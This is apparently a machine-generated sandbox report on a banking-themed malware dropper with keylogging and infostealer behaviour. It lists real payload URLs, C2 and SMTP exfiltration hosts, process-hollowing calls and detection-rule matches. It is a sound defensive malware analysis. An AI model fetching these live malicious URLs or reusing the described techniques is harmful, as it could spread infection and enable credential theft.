                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 030B78DCh14_2_030B7688
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_030B7E60
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h14_2_030B7E56
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 4x nop then jmp 05E5BCBDh19_2_05E5BA40

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1E4B8 InternetCheckConnectionA,4_2_02A1E4B8
                      Source: global trafficTCP traffic: 192.168.2.8:49708 -> 51.195.88.199:587
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 51.195.88.199 51.195.88.199
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 198.252.105.91:443
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49709
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49721
                      Source: global trafficTCP traffic: 192.168.2.8:49708 -> 51.195.88.199:587
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: gxe0.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                      Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.000000000688E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                      Source: neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.000000000688E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                      Source: neworigin.exe, 0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                      Source: powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1600643610.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: x.exe, x.exe, 00000004.00000002.1534436929.0000000021DEF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1506456469.0000000000686000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1534105002.0000000021BF0000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443906217.000000000287C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1510941907.000000000287E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020764000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1540551626.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000C.00000000.1506872662.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001A.00000002.1660368294.0000000002B12000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001B.00000000.1636599259.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001E.00000002.1742914385.0000000002B52000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                      Source: neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: neworigin.exe, 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 0000000F.00000002.1600643610.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: neworigin.exe, 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/
                      Source: x.exe, 00000004.00000002.1526389874.00000000207ED000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysx
                      Source: x.exe, 00000004.00000002.1526389874.0000000020803000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000207D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_WisrysxlfssV;
                      Source: x.exe, 00000004.00000002.1509390491.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfssb
                      Source: x.exe, 00000004.00000002.1509390491.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfsst
                      Source: x.exe, 00000004.00000002.1509390491.0000000000631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
                      Source: powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.8:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49718 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 28_2_0691C970 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0691D7F0,00000000,0000000028_2_0691C970
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Source: 13.0.neworigin.exe.d90000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: server_BTC.exe.12.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: TrojanAIbot.exe.14.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batStatic file information: 1057171
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A18670 NtUnmapViewOfSection,4_2_02A18670
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A18400 NtReadVirtualMemory,4_2_02A18400
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A17A2C NtAllocateVirtualMemory,4_2_02A17A2C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,4_2_02A1DC8C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02A1DC04
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A18D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02A18D70
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,4_2_02A1DD70
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A17D78 NtWriteVirtualMemory,4_2_02A17D78
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A17A2A NtAllocateVirtualMemory,4_2_02A17A2A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A1DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02A1DBB0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A18D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02A18D6E
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AA8670 NtUnmapViewOfSection,26_2_02AA8670
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AA8400 NtReadVirtualMemory,26_2_02AA8400
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AA7A2C NtAllocateVirtualMemory,26_2_02AA7A2C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AA7D78 NtWriteVirtualMemory,26_2_02AA7D78
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AA8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,26_2_02AA8D70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,26_2_02AADD70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AA86F7 NtUnmapViewOfSection,26_2_02AA86F7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 26_2_02AA7A2A NtAllocateVirtualMemory,26_2_02AA7A2A
